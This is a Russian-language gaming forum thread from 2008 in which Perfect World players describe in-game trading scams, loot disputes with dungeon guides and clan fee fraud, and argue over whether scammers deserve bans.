А про ДК слитки чистого золота что продают по 40-50к, помоему за такое банить надо. Или поставить ограничение в цене этих слитков(хотя никто этого делать не будет) Я както тоже решил проверить. Поставил 3 слитка по 39к написал что голд и тутже купили... ***. Каюсь. Больше не буду тк жалко новичков. Все ими когдато были.
VeseliyRoger
09.09.2008, 21:32
А я часто пытался дарить нубам нахаляву яица пэтов которые мне уже не нужны. Просто бывает место в инвентаре заканчивается и для нового пэта клетку нужно освободить а старое яицо деть некуда. А продавать какогонть варвара горного за 80 золота вендору бессмысленно. Хочу помоч человеку который ходит с какимнь непроскилованным волком или скорпионом а он не берет((( Типо че те от меня надо или просто не отвечает и убегает) Никто уже не верит в человеческую добрату и все думают что это развод)
А почему бы тебе просто не выкинуть яйцо и крикнуть "Яйцо мне не нужно! Бери кто хочет!"?))))
Kobold1986
10.09.2008, 17:25
Последнее время появились еще нехорошие тенденции продавать слиток чистого золота (который используется как ресурс для драконьего квеста) под видом золотого слитка для торговли с шопом. Стоит лавка, в ней лежат слитки чистого золота(дк квест) и продаются по 45к. Ни в коем случае не берите. Если хотите что то купить из шопа ищите продавцов. В "неправильных" слитках при описании внизу есть подпись бирюзовым цветом : используется для квеста поиск драконов Я цы 31. Если вы видите эту надпись при наведении курсора на слиток будьте уверены - то что вам предлагают не является золотыми слитками, за которые покупаются вещи из шопа.
Поправка. Надпись "используется для квеста поиск драконов Чао Фэн"
Фр. Опять вылезли злостные защитники прав нубов, которые за месяцы игры не поднимаются выше 30 левела но все-привсе знают о злобных хаях, которые обманывают бедных несчастных нубов, отбирают лута на 2-3k, которые выпали в данже.
Хотя, тупым, криворучим, нифига не умеющим и постоянно лезущим на рожон нубам так и надо. Тратить на них свое драгоценное время, нервы и силы, а потом ещё отдавать лут? Ха-ха.
В общем, если кто-то в упор не желает понимать, что копеечный фиолет и низкоуровневые ДК нужны только оооочень жадным людям, то что-то доказывать бесполезно. Обычно такие люди начинают сами водить по данжам и в точности копировать действия так порицаемых ими хаев - подставлять клиента, зажимать лут и т.п.
Браво, Кецалькоатль. Сначала причислил себя к хаям, ворующим лут у нубов. А потом опустил этих хаев, в том числе и себя. Посто нет слов. Браво.
А почему бы тебе просто не выкинуть яйцо и крикнуть "Яйцо мне не нужно! Бери кто хочет!"?))))
Ну можно и так но ведь в игре не тоько друиды есть а судя по вышеописанному многие и за копейку убьют. Подобрать то любой может. А хочется чтобы прирученный тобою пэт еше комунть послужил.
Slipstream
12.09.2008, 03:23
Ну можно и так но ведь в игре не тоько друиды есть а судя по вышеописанному многие и за копейку убьют. Подобрать то любой может. А хочется чтобы прирученный тобою пэт еше комунть послужил.
Может просто те петы, которых ты отдаеш никому не нужны... вот и не берут. По этой причине и валяются яйца на локациях.
Charliez
12.09.2008, 03:48
Когда я на довольно большом уже уровне решил прокачать крафт украшений, то накрафтилось очень много низколевельного барахла. Много было с 1, 2 звездочками. Продавать неписю смысла нет большого. Решил раздарить желающим. Поорал в чат о халяве, хоть бы кто отозвался :( Потыкал в пару персов, торг не берут. Совсем зашуганные :(
Тогда решил устроить атракцион неслыханной щедрости, и пробежался по площади ГД, по дороге выкидывая шмот по одному, за мной тянулась сверкающая дорожка, которая в мгновение ока расхваталась малышами :)
Rinoa1337
12.09.2008, 19:28
Когда я на довольно большом уже уровне решил прокачать крафт украшений, то накрафтилось очень много низколевельного барахла. Много было с 1, 2 звездочками. Продавать неписю смысла нет большого. Решил раздарить желающим. Поорал в чат о халяве, хоть бы кто отозвался :( Потыкал в пару персов, торг не берут. Совсем зашуганные :(
Тогда решил устроить атракцион неслыханной щедрости, и пробежался по площади ГД, по дороге выкидывая шмот по одному, за мной тянулась сверкающая дорожка, которая в мгновение ока расхваталась малышами :)
Помниться так в MU Online было :) сердечки хаи открывали и выкидывали дроп за ненадобностью
Я считаю что вобще нужно ввести в Игру Клан Админов или Модераторов чтоли, чтобы могли банить за мошенничество, оскорбленияи т.д. Отбор жесткий в этот Клан, но более менее % криминала в ПВ упадет =). Спасибо за Внимание. =)
Я считаю что вобще нужно ввести в Игру Клан Админов или Модераторов чтоли, чтобы могли банить за мошенничество, оскорбленияи т.д. Отбор жесткий в этот Клан, но более менее % криминала в ПВ упадет =). Спасибо за Внимание. =)
а что Вам мешает сделать скрин и обратиться в саппорт?
я однажды так поступила(было грубое нарушение правил), отреагировали в течении 10 мин. Редиска было забанено.
rasmus445
13.09.2008, 22:22
Хороший и грамотный развод это часть любого игрового процесса. В игре каждому индивиду есть свое место.
witshersan
14.09.2008, 19:45
Ага главное чтобы ты разводил а не тебя
Kompas89
14.09.2008, 19:56
а что Вам мешает сделать скрин и обратиться в саппорт?
я однажды так поступила(было грубое нарушение правил), отреагировали в течении 10 мин. Редиска было забанено.
угу.по правилам на 1-2 дня :)
КОЛАЧ этот человек был мастером клана "БОГИ" он собрал с каждого по 50к типо на продвижения клана потом он сказал что мы тоесть те кто достигли 35+ переходим в новый клан "Skysong" под его руководствам .А остальные остаютса в "БОГИ" .Дальше случилось следушее прошло пару дней он передал мне титул Мастера нечего не сказав и исчез!!!На всемои допросы он не чего не ответил.Просто поступил по хамски хотябы вернул бы всем кто ему давал те 50 к.Короче не мастер он а падонак!!!
Quetzalkoatl
15.09.2008, 01:26
А сколько народу-то было?
По 50k - это как-то мелковато.
the_beginner
15.09.2008, 14:47
А сколько народу-то было?
По 50k - это как-то мелковато.
Если просто играть не фармя деньги - делать квесты, собирать весь лут, продавать ненужное НПЦ - то это все что есть у перса 15-20 лвл, ну или половина всего что у него есть. К 35 я уже фармил так что не скажу, но думаю что все равно эти деньги можно найти на что потратить - ту же хирку бронзовую купить и играть без медитации 3 часа, сделать лвл.
Если ты имеешь в виду что это мало для того чтобы сделать клан 2 лвл, то это ровно именно столько сколько надо на клан 2 лвла. 50чел*50к = 2500к.
Потом он видимо решил сэкономить сделав второй клан вместо расширения предыдущего. А вот зачем вообще пропал - непонятно. Может и действительно кинуть решил. Способ кидания вполне себе отличный, поэтому сдавать на 2 лвл клана только если уверены на 100% или вообще только после того как клан уже 2 лвл.
Только вот ник сюда не надо было кидать. Если он кинул людей то по этому нику он уже в игре не будет. А если просто пропал по неигровым обстоятельствам то появится, объяснит все, извинится, а сообщение на форуме уже можно будет удалить только через модеров.
Хороший и грамотный развод это часть любого игрового процесса. В игре каждому индивиду есть свое место.
Советую не пренебрегать прочтением правил. А то уже скоро скажут что хорошо и грамотно написанный бот это часть любого игрового процесса а также неплохой способ заработать игровых денег.
С меня типа "админ" просил денег за то что я ПК. Я ваще в панике не знаю че делать грозится баном аккаунта на месяц ник SkEnemy
С меня типа "админ" просил денег за то что я ПК. Я ваще в панике не знаю че делать грозится баном аккаунта на месяц ник SkEnemy
Скрин и в саппорт.
Выдавать себя за представителей администрации запрещено %)
the_beginner
16.09.2008, 14:07
Гляньте:
http://forum.pwonline.ru/showthread.php?p=225078#post225078
Есть идеи?
В принципе это упрощенная реализация известного развода из реальной жизни ("лоху" продается ненужная вещь дороже своей цены, потом покупается другим челом в несколько раз дороже, он покупает сразу 100 таких вещей, бежит продавать, но уже некому).
Но похоже при этом используется какой-то баг игры - каким-то образом товары выставленные на продажу не могут быть куплены.
respect13
16.09.2008, 14:13
именно, а правилами запрещается использование багов в личных целях
я не раз сталкивалась с тем что коту что то продать нельзя (по делу и по нормальной цене). Это не баг, а достигаеться он мне кажеться таким путем: когда у кота нет денег.. то и купить он ничего не сможет. Отсюда вопрос: есть ли возможность изменить цены во время котовства... я что то этого не нашла. В торговле я полный нупп :) Однако еще раз замечу, сталкивалась с таким не раз... и люди выходили из кота, бежали чего-то там сдать-продать чтоб получить денег и у меня потом купить, если я им в ПМ говорила, что интересующий ресурс по предложенным ценам у меня есть в наличии, но продать я "почему-то" через магазинчик не могу.
the_beginner
16.09.2008, 14:27
я не раз сталкивалась с тем что коту что то продать нельзя
Если проверка на цену стоит на клиенте а не на сервере, то можно ее по идее отключить с помощью отладчика или готового хака. Но это наказуемо и не может случиться случайно.
Я ни разу не встречал кота которому невозможно продать.
Ты уверена что правильно продавала?
Да.. уверена на все 100 (если ты о тыкать на изображение предметов вверху а не на пустое поле в нижней части), и люди эти кидалами не были, ибо скупали по объективным +- ценам :)
у меня на форуме чел написал сообщение...
ААА народ! Украли Меч полёта Комета!
Короче, надо было зарядить меч, и попросил в чате , чтоб сказали как.
Игрок Plot3 предложил зарядить меч за 3000, ну я согласился... В общем произвели обмен, он сказал что я лох, дибил, дурак и этом роде, и улетел на моей Комете..:bk: Всё, плакала моя комета или еще можно как нить исправить там, вернуть?
ну что я мог ответить на это... человеческая глупость вещь бесконечная...
Покупать с кота можно в любом раскладе.
Но если в инвентаре _нет_ _свободных_ _слотов_ то _скупка_ _котом_ не работает.
И тут повторю.
но, заметьте... искоерняемая методом проб и ошибок :)
snohodets
16.09.2008, 14:56
если вы что либо купили то ето убавиться, значит при продаже ето увиличиться, так что равно купленное количество должно продаваться в том же количестве.
Anatol_rus
16.09.2008, 20:49
Просьба к админам сервера орион забанить следующего типа,он как бы покупает траву по сумашедшей просто цене и продает ее же в 2 раза дешевле,фотки прилагаются.Впарить ему траву нельзя!!
P.S.Новички будьте внимательны лохотроны есть не только в реальной жизни))
respect13
16.09.2008, 21:01
Похоже на то, о чем говорили днем. И кажется это не баг, а особенность игры - если ты лоханулся и покупаешь дороже, чем продаешь - срабатывает "защита", чем и научились пользоваться те, кто первый это заметил. Т.е. "защита от дурака" превратилась в "ловушку для дурака".
MetalMaster
18.09.2008, 16:38
Просьба к админам сервера орион забанить следующего типа,он как бы покупает траву по сумашедшей просто цене и продает ее же в 2 раза дешевле,фотки прилагаются.Впарить ему траву нельзя!!
P.S.Новички будьте внимательны лохотроны есть не только в реальной жизни))
Если ты хочешь, чтобы на твои слова как-то отреагировали, отправляй их сюда - http://support.nivalonline.com/
Размещение скринов на форуме разве что потешит твое самолюбие и создаст повод для флейма.
JoeCucan
19.09.2008, 08:33
Провоцируйтесь, и ещё как! Тока ПКште не через Ctrl, а с помощью дуэли))
the_beginner
19.09.2008, 13:51
Провоцируйтесь, и ещё как! Тока ПКште не через Ctrl, а с помощью дуэли))
А на какое сообщение ты отвечаешь? Че-то я не припомню такого... Или не в ту ветку запостил?
К сведению тех, кого водят по данжам. Много раз водила нубов в данжи, эти постоянные вопросы "а лут вы точно отдадите?" просто надоедают. Конечно если ум есть то знают как можно избежать увода дропа. Как-то получилось так, что меня обвинили в том, что я забрала лут. Причём это было уже позже данжа. Дело в том, что я не проверяю состояние своего инвентаря. Мне как-то всё равно что мне досталось. Потом появился ещё один клиент и чтобы избежать каки-либо конфликтов, объяснила нубу, что нужно поставить в разделе "ближлежащий игроки" галочку на "свободно" а не "случайно". сама тоже эту галку поставила. Кинула ему пати, собрала группу, передала ему пл. Таким образом всё что он поднимал доставалось только ЕМУ. Вот и всё. Учитесь
the_beginner
19.09.2008, 18:18
Вот и всё. Учитесь
Дело в том что всех людей можно _условно_ разделить на 2 категории: честные и нечестные.
Вот ты например, если тебе из-за случайного распределения достанется форма в данже (тебе она для ношения не нужна, подумаешь какое-то там колесо Инь-Янь, только на продажу), и нуб тебе скажет мол договаривались за лут, отдай пожалуйста. Ты отдашь? Или будешь говорить "лут это лут, а форма это форма" как тут доказывали одни, или вообще отморозишься как это часто бывает? В зависимости от ответа ты попадаешь в одну из категорий.
Так вот если проводники попадутся нечестные то свободное распределение лута не поможет, а наоборот позволит им поднять лут, если он упадет с босса.
Так что твой рецепт не панацея а скорее рекомендация водящим, чтобы не было претензий. И тебе надо его было запостить в соседнюю ветку про правила в 19-29 данжах.
А в данжи, с точки зрения лута, лучше всего ходить патей своего лвла - и шансов на дроп гораздо больше, и распределение случайное: кому что упало то уже его и обижаться нечего.
Да, надо больше времени, но за этот час никто никогда не нафармит столько сколько стоит золотая форма или миражи из разломанного фиолета.
В принципе логично. У нас в клане лут не забирают. Свободное распределение было поставлено только для спокойствия нуба) Так сразу и договорились с нубом. Другой вариант: ходили недавно в анж.Стояло случайное распределение. Выпал какой-то синий шлем. Нуб просто спросил на мага он или нет. Ему сразу ответили что после данжа всё отдадим. А он сказал что ему только на мага нужно.остальное можно забирать т.к. ему не нужно.Поэтому следует заранее оговарить условия.
ет все прекрасно конечно но что делать если тебя уже кинули и не плохо на ската шоповского талисман?
VeseliyRoger
20.09.2008, 11:16
Повеситься...
А если серьёзно, попробуй обратиться в саппорт. Хотя, маловероятно, что тебе его вернут...
пошла вешаться(((,да я ступила конечно, но таких я думаю стоит админам наказывать
в gm стучала но все бестолку не отвечают
Balistik
20.09.2008, 15:37
Не давайте ваши вещи игровым знакомым,какимибы хорошими они не казались.
У меня такое мнения что ты хочешь сказать что в игре все розводилы и не кому не доверять..... да неспорю есть розводилы но и есть нормальные люди которые попросят шмотку на время поносить и отдают.... в крайнем случае если ты так боися за свою шмотку то можно попросить взалог у него что-то такое что бы стоила так как твоя шмотка... И что бы человеку доверить надо его сночало тчательно проверить.... вот я играю в Рагнарог я многим людям доверяю которых уже знаю по 4 года и нехто меня не розводил.... и мне доверяли много чего и я не кого не розводил.... хотя моего друга розвели на норм шмотку.... но он его знал не очень хорошо.
Так что ненадо говорить что бы не кому не доверять и т.д.... надо знать кому доверять, а если ты сомневаеся в комто то лутше не чё не давать...;)
Будущим жертвам: Бесплатный сыр только в мышеловке.
Потенциальным кидалам: Люди, имейте совесть и не разводите никого. Это не просто игра. Это вопрос вашей совести.
Quetzalkoatl
21.09.2008, 12:16
На вечную тему данжей:
Изначально, понятие лут расшифровывается как неиспользуемые вещи, идущие на продажу. Если не ошибаюсь, в рагнарьке даже отдельный раздел трюма был под лут. Так что, если водилы обещают отдать вам лут, а поднимают форму, которую будут носить сами/отдадут соклановцам, то они вполне в своем праве.
Договаривайтесь по-русски, либо используйте правильные сленговые термины.
Но с другой стороны, идиота, который будет требовать отдать ВСЕ, я лично в данж не поведу. Лениво выбрасывать нападавшее и объяснять, что темные символы не передаются.
Rinoa1337
21.09.2008, 12:57
Изначально, понятие лут расшифровывается как неиспользуемые вещи
вот (http://www.google.ru/search?q=define%3Aloot&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:ru:official&client=firefox-a), посетите, пожалуйста
Лениво выбрасывать нападавшее и объяснять, что темные символы не передаются.
Ну если уж выбрасывать "лениво" то, наверное, включить свободный режим лута совсем в облом :)
BASKET66
22.09.2008, 20:25
блин ни кому доверять нельзя:(:help:
Читал этот тему на форуме, но игре не сталкивался ни разу сам, но вот наступил и мой час.
В субботу , выполнял квест на яшму в ГД, стоял у торговца, вдруг в личку стучится чувак(ник:SmaK17):
Разговор приведу дословно:
Он: Привет
я: Привет
Он: Как дела?
Я: Все ок, а что?
Он: Дай костюмчик померить?(Насчет костюма поясню, на мне костюм воина за 4 золота)
На это я ему ответил диким хохотом, поскольку более глупого развода я не видел.Я человек в онлайн игры играющий мало, поэтому с разводами как то не сталкивался. Но это меня просто убило...Насторожил меня вопрос как дела...согласитесь странно, когда человек которому от вас ничего не надо спрашивает о делах))
Кстати, человек после, разговора вышел из игры!
Позже приложу скриншот куска беседы где вопрос про костюм(Сразу зафоткать не догадался). А всем остальным скажу так не страдайте манией величия, никто к вашей персоне просто так интерес проявлять не станет, а если стал, значит есть интрес.
Удачной игры!!!Будьте честными хотя бы в идеальном мире.
Кстати, померять костюмчик можно и при продаже оного за юани :) Ставите кота, ставите нереальную цену за костюм.. меряйте на здоровье ;)
Со стилем действительно бывают проблемы, непонятно что как сидит.. вот и бегаешь по котам, примеряешь :)
А на такие просьбы действительно лучше не отвечать прытью и желанием помочь - хотя я бы предложила померять через магазин...
Хаям которые водят в данж одни бьют один стоит около бота и ждет пока он умрет и тыкает кнопку поднять вещь. так они собирают формы.
много раз видел сам лично.
На прошлой неделе интересный момент был. Клан вел соклана – нуба в 29 данж. С боса выпали одни монеты, так что отдавать и нечего было вроде. Но оказалось, что и тут может начаться «веселье». В клан чат от этого игрока поступило обвинение клану в кидалове. Я долго выяснял, чего же там случилось. Оказалось, кто-то выбросил кровь с боса и ее подобрали. Нуб увидел что это поднято, а ему не дали и начал вопить. Пол часа объясняли, что такое кровь и что это никто не обязан никому отдавать. В итоге ничего не удалось объяснить человеку. Весь клан был обвинен в кидалове снова и нуб ушел/
Предусмотрительность, конечно, это хорошо, но как и в любом другом деле не стоит перегибать палку. Паранойя может испортить впечатление от игры. Просто думайте головой, ничто другое не поможет.
Я к сожалению не знал про примерки, а вот поведение показалось подозрительным. Может зря обидел парня, хотя может и нет.
Charliez
23.09.2008, 12:57
Ну мне один раз пришло предложение о торге и сообщение в личку, мол, засунь пуху в торг, хочу посмотреть е характеристики. От перса ~60 лвл :) Подумалось поначалу, что это развод :) Однако товарищ реально не знал элементарных вещей. Пришлось рассказать, как смотреть характеристики персонажей и эквипа, надетого на них, без всякого торга :)
Я вот тут думаю, кем надо быть, чтоб купить под видом ГОЛДА для шопа ЗОЛОТОЙ СЛИТОК, в котором написано ИСПОЛЬЗУЕТСЯ ДЛЯ КВЕСТА ИСТКАЛЕЬ ДРАКОНА, Чао Фэн (41)? Или знак1, который из КОНТРАКТА, и где ясно написано ЛЕВЛ 60, а не как ни знак в данж, который, кстати, не передается. Я канешна понимаю, что подписи к игровым вещам читают только нубы, как и гайды на форуме, а тру папы сначала попадутся на разводку, а потом плачутся. Или пытаются кого-то кинуть так же, как и их.
Из серии разводка с крыльями: Для сида крылья у жреца в ГП стоят 10 юань. Для других рас - 10к. Умудряются продавать сидовские крылья 30- левлам других рас: КУПИ И БУДИШ ЛИТАТЬ!!!!!! гласит надпись на шопе. И ведь покупают. Несмотря на жирную красную надпись ОГРАНИЧЕНИЕ ПО ПРОФЕССИЯМ:ЛУЧНИК, ЖРЕЦ, такие крылья покупают воины и оборотни, друли и маги.
Вопщем, еще раз про спасение утопающих)
Несметна орда наивных глупцов, жадных халявщиков и ленивых дураков. И пока они есть - будут процветать и множить свой капитал разного рода "предприимчивые люди". Даже стоя рядом с разводилой и предупреждая их об опасности они сломя голову лезут подарить ему свои деньги в надежде на обещания "добрых дядь" и их подельников.
Сегодня тока была такая картина. Обычное дело с продажей за 50к, покупкой за 500к., работающее с прогой АртМани.
Вопросик: это наказуемо? Или вся толпа тугодумов и дурачков сама виновата и продавец просто мягкое и пушистое создание, которое надо погладить по головке да еще и приплатить за предприимчивость и изобретательность?
Как я посмотрела, так во всех MMORPG однотипные кидалы, фантазии что-ли не хватает?))
А вообще бдительность лучьший способ показать фигу кидале в удобный момент =))
Та меня порой поражает тупость отдельных индивидов. Ему тут же кричишь что не делай так, а он лезет все равно. Ппц, стадо баранов - как еще сказать. А ирония в том что, сколько бымы не написали тут предостережений, ни один баран не прочитает эту тему и даже не задумываеться об этом. В общем, в семье не без урода 8)
BloodyMerry
26.09.2008, 03:02
Как я посмотрела, так во всех MMORPG однотипные кидалы, фантазии что-ли не хватает?))
Зачем им фантазия, если и без нее все работает? Такой вот печальный вывод :(
Так надо осторожнее значит быть! Если знаешь разводы в других MMORPG то и в этой не попадешься :))
:p И вообще кидалы бяки все! :fear: :slon:
the_beginner
29.09.2008, 16:18
Сегодня тока была такая картина. Обычное дело с продажей за 50к, покупкой за 500к., работающее с прогой АртМани.
Вопросик: это наказуемо?
Наказуемо аж 2 раза.
1 - мошенничество наказуемо согласно правил
2 - использование программ типа АртМани можно считать хаком а хак наказуем
Только тут вот в соседней ветке кто-то очень авторитетно заявлял что это делается и без АртМани.
ВАЖНО!!! Ещё есть коты которые продают какую нибудь дешовую вещь (камни одного источника) в 20 раз дороже и покупают её дороже в 250 раз. Типа ошибка или из лучших побуждений. Естественно народ покупает за дорого и хочет продать заработав на этом приличную сумму. А потом при продаже оказывается что "сервис временно не доступен". Вот такой облом)))))))
MetalMaster
03.10.2008, 00:32
ВАЖНО!!! Ещё есть коты которые продают какую нибудь дешовую вещь (камни одного источника) в 20 раз дороже и покупают её дороже в 250 раз. Типа ошибка или из лучших побуждений. Естественно народ покупает за дорого и хочет продать заработав на этом приличную сумму. А потом при продаже оказывается что "сервис временно не доступен". Вот такой облом)))))))
Трюк стар, как мир ММОРПГ :) В некоторых играх он реализуется двумя людьми. Один покупает что-то за, скажем, 10 у.е., второй стоит рядом и продает это же самое за 1 у.е.
Почему то друг друга они упорно игнорируют :D Самое смешное, что люди ведутся.
Та меня порой поражает тупость отдельных индивидов. Ему тут же кричишь что не делай так, а он лезет все равно. Ппц, стадо баранов - как еще сказать. А ирония в том что, сколько бымы не написали тут предостережений, ни один баран не прочитает эту тему и даже не задумываеться об этом. В общем, в семье не без урода 8)
Как приятно самоу себе лизнуть. :lol:
Может дело не в фантазии? А в том что возможности всех ММОРПГ очень похожи?
Так надо осторожнее значит быть! Если знаешь разводы в других MMORPG то и в этой не попадешься :))
:p И вообще кидалы бяки все! :fear: :slon:
Не кидалы бяки - те кого развели лохи. И вот когда оказываешся в списке тех кого развели - так не приятно это осозновать и легче обвинить кидалу чем себя олхом признать
respect13
03.10.2008, 10:36
Был вчера в ГМ и ужаснулся - таких "ничегонепокупающих" котов стало больше. Как правило сидят коты с синими никами, но вчера удача улыбнулась! Кот с белым ником, ник MeV, клан ОМОН. При встрече на просторах Идеального вне сейфзон, можно объяснить неправильность её позиции по отношению к другим игрокам)))
Был вчера в ГМ и ужаснулся - таких "ничегонепокупающих" котов стало больше. Как правило сидят коты с синими никами, но вчера удача улыбнулась! Кот с белым ником, ник MeV, клан ОМОН. При встрече на просторах Идеального вне сейфзон, можно объяснить неправильность её позиции по отношению к другим игрокам)))
А как по мне - то кидал банить не стоит. Логика проста - развивать в юных эльфах хоть какую то внимательность - два, три раза разведут - мож в голове что нибудь осядет, задумается кто виноват в разводе - а не осядет, ну поноет на форуме и успокоится.
asterblin
03.10.2008, 10:48
или принести с собой 1 железную пулю - может повезти, и денег у кота(в которых обычно не оставляют) хватит на то, чтобы купить ее
(касательно сервис временно.... - один раз в городе перьев видел стрелы точно так , но по 2500, а я лучник, и как раз одну продал, правда больше кот покупать отказался)
respect13
03.10.2008, 10:54
А как по мне - то кидал банить не стоит. Логика проста - развивать в юных эльфах хоть какую то внимательность - два, три раза разведут - мож в голове что нибудь осядет, задумается кто виноват в разводе - а не осядет, ну поноет на форуме и успокоится.
А я про бан и не говорю))) А вот Теплые встречи на просторах - это дааа) Причем мне кажется - чем больше обсуждались возможности и способы, как это сделать, тем больше стало появляться таких котов
the_beginner
03.10.2008, 14:36
Не кидалы бяки - те кого развели лохи.
На каждую хитрую ******* найдется свой болт с газовой резьбой. Чего я тебе искренне и желаю. Тогда может задумаешься.
2MetalMaster
Кстати последний популярный развод с куплей-продажей гораздо старше чем MMORPG :) По крайней мере эти новомодные "графические". Только да, делался он с 2 людьми а не с 1.
и как раз одну продал, правда больше кот покупать отказался)
Хехе, это был альтернативный разводила-ламо. Настолько туп что не понял способа несмотря на подробное описание.
Кто-нибудь пробовал таких котов скринить и отсылать для бана за мошенничество, согласно правил? Есть какой-то результат? По идее должны банить не только синего кота но и белого владельца... из топ-ги...
На каждую хитрую ******* найдется свой болт с газовой резьбой. Чего я тебе искренне и желаю. Тогда может задумаешься.
А ты не переживай так.
Чей то ты кстати взьелся.
Меня тоже развели, правдв в линейке и правда на 20 левеле - с того момента (а было это три года назад) - НИРАЗУ.
Так что о чем говорю знаю.
И ктстаи, в отличии от других - не начал создавать эмо темы о том как меня бедного нубаса развели, и что разводила козел и все такое - кстати разводиле я в приват улыбнулся и сказал - лихо ты меня. И все - на этом наше общение закончилось.
Для себя вывод сделал - ММО Игры - только называются игры - все остальное реально (отношения между людьми), в конце концов играют живые люди а не боты (думаю выводы сам сделаешь).
И еще кстати: тот случай меня научил даже лицензионые соглашения читать - вдруг там написано будет - поставив эту прогу на свой комп вы соглашаетсь с тем что ваши органы будут переданы такому то институту? ))))
the_beginner
03.10.2008, 17:58
Чей то ты кстати взьелся.
Очень не нравится когда защищают мошенников и всякие другие аморальные явления.
Меня тоже развели
Ну если ты от этого получил фан то понятно почему защищаешь. Просто не все такие, многим неприятно когда за их счет без их согласия наживаются. Почему ты этого не понимаешь, считаешь что все должны быть такими как ты?
Про поведение людей в MMORPG лучше никто не написал:
http://insane.su/forum/index.php?showtopic=827&st=0&p=7331&#entry7331
И еще кстати: тот случай меня научил даже лицензионые соглашения читать
Это дело полезное но многие считают паранойей. И оффтопом ;)
Очень не нравится когда защищают мошенников и всякие другие аморальные явления.
Ну если ты от этого получил фан то понятно почему защищаешь. Просто не все такие, многим неприятно когда за их счет без их согласия наживаются. Почему ты этого не понимаешь, считаешь что все должны быть такими как ты?
Ты где это прочитал про защиту мошенников - кстати, ммм, дай как плиз мне определение мошенника - в игре ;).
Все то о чем ты говоришь (типа мошенничиство, обман - это все выдумка, попытка перенести часть реального мира на игру)
Я говорю лишь о том - что в игре мошенников не нужно банить и потакать типа жертвам - сами виноваты - пускай учатся на своих ошибочках - глядишь в жизни умнее будет.
Про фан от рзвода - это твое не обоснованное умозаключение - верь во что хочешь и думай что хочешь - мне всеравно.
И про наживку без чьего либо согласия.... мммм, не понял, поясни..
Кто в разводотрейде нажимает кнопку - подтверждения? Разводила, или разводимый? - Тото же и оно!!!
Rinoa1337
03.10.2008, 18:17
сверните флейм, пожалуйста
сверните флейм, пожалуйста
Больше не буду
sonya711
03.10.2008, 18:22
Я считаю что вобще нужно ввести в Игру Клан Админов или Модераторов чтоли, чтобы могли банить за мошенничество, оскорбленияи т.д.
НЕ СОГЛАСЕН!!! В игре должен присутствовать момент обмана и мошенничества. Нужен и ПК и "развод нуба" и прочее "прелести" (кроме ботов и использования программых ошибок)... Никогда никого не разводил и не ПК-шил (да это и лвл пока не позволяет). Но я за большую свободу дейстрия в игре! Пусть будет пореалистичнее. И если меня напарят как-нибудь хитро, чтож, буду умнее в следующий раз.
P.S.: Всё IMHO.
Особенно если вас напарят на реал (тут читал девушку на ската из шопа развели).
Особенно если вас напарят на реал (тут читал у девушку на ската из шопа развели).
Ты вот что скажи
Кто в конечном счете нажимает кнопку подтверждения передачи денге/шмота/чего угодно?
И я не защищаю кидал.
А говорю что в ваших разводах виноваты только вы
Да возможно винават наивный человек нажавший на кнопку но всеже ИМХО это неповод переходить все границы ... Вобще то ето пустой разговор если человек, как бы помягче сказать, был ниже плинтуса то он там так и останется сидеть и довольствоваться что он кого то развел хотя его и человеком назвать трудно.
sonya711
03.10.2008, 20:48
Даже если напарят на реал, то будет особо обидно, конечно. Но не смертельно же! А продажа/покупка у котов-мошенников с целью наживы? Тут виноват и мошенник и жадный геймер.
Kompas89
03.10.2008, 20:55
НЕ СОГЛАСЕН!!! В игре должен присутствовать момент обмана и мошенничества. Нужен и ПК и "развод нуба" и прочее "прелести" (кроме ботов и использования программых ошибок)... Никогда никого не разводил и не ПК-шил (да это и лвл пока не позволяет). Но я за большую свободу дейстрия в игре! Пусть будет пореалистичнее. И если меня напарят как-нибудь хитро, чтож, буду умнее в следующий раз.
P.S.: Всё IMHO.
я на тя посмотрю когда тебя на 1кк кинут *lol*
Конечно несмертельно особенно если разводила и понятия неимеет как и кому деньги достаются. Что до жадности то как известно она фраера згубила чего всем разводилам и желаю.
sonya711
03.10.2008, 21:15
я на тя посмотрю когда тебя на 1кк кинут *lol*
LOL! :) Меня? На 1 кк кинуть??? Плиз, киньте меня хоть на одну монетку!!!
----------------------------------
Чего-то я уже начал флудить не по детски. В пень это тему. Не буду засорять форум.
Uzurpator666
03.10.2008, 21:38
Зло и добро :)
Всё это "кидание" на совести кидающих.... всё зло возвращается... полюбому
Даже если напарят на реал, то будет особо обидно, конечно. Но не смертельно же! А продажа/покупка у котов-мошенников с целью наживы? Тут виноват и мошенник и жадный геймер.
Угу, несмертельно. Шутишь чтоли? Тут уже сумма реала на который развели играет роль. Одно дело когда развели на копейки, можно выматерится и забыть, а другое дело когда на несколько косарей, за которые руки оборвать не грех.
Хотя спору нет, осторожного и недоверчивого человека развести нереально.
А к списку кидал просто совет, если плохо знаете человека из клана "нечесть" то лучше недавайте ничего ни в долг ни посмотреть тем более. Скользкий народец, то ската дай в руках подержать 17ур который еще 33ур его заценить даж несможет, то пантеру подари, то пару хирок займи (верну с процентами)
Eve-Black
04.10.2008, 13:57
Скажите пожалуйста, есть ли на форуме раздел куда можно "сливать" мошенников ? Т.е скрины, на которых запечатлен разговор с персонажем, который пытался обмануть. Хотелось бы в Бан отправлять таких умников, чтоб не наживались. :shuffle: У меня уже просто есть одна попытка кидалова через пати.
подскажите ссылочку если есть пожалуйста.
Weranika
04.10.2008, 16:53
А зачем тогда играть раз небудет развода тогда лучше отруби инет поставь какуюнибуть стрелялку и тупа ходи бей ботов там тебя точно некто неразведёт.
STERWA
murlykot
04.10.2008, 16:56
подскажите ссылочку если есть пожалуйста.
http://support.nivalonline.com/
А зачем тогда играть раз небудет развода тогда лучше отруби инет поставь какуюнибуть стрелялку и тупа ходи бей ботов там тебя точно некто неразведёт.
STERWA
Затем, что это ИГРА. И приходят сюда люди играть, отдохнуть от реала, от тех же самых разводов и обманов, необходимости оглядываться на каждом шагу, не стащили ли кошель, не обвесили ли в магазине и т.д.. А все эти кидалы тянут сюда всю эту грязь из реала. Превращают игру в кривое отражение реальности, лишая нормальных игроков возможности просто отдохнуть и пообщаться, а не шугаться от каждого предложения, показавшегося сомнительным. Ведь не все здесь мошенники, а из-за них остальные игроки перестают верить друг другу.
Что за кидалово с покупкой продажей одинаковых предметов?
Ситуация:
Кот продаёт стрелы по 5к и покупает по 50к - причём продать ему стрелы неполучаеться
Колитесь кидалы!!!!
komok181
05.10.2008, 14:16
Ситуация:
Кот продаёт стрелы по 5к и покупает по 50к - причём продать ему стрелы неполучаеться
Колитесь кидалы!!!!
Ну что можно сказать.... Я В ШОКЕ!
Charliez
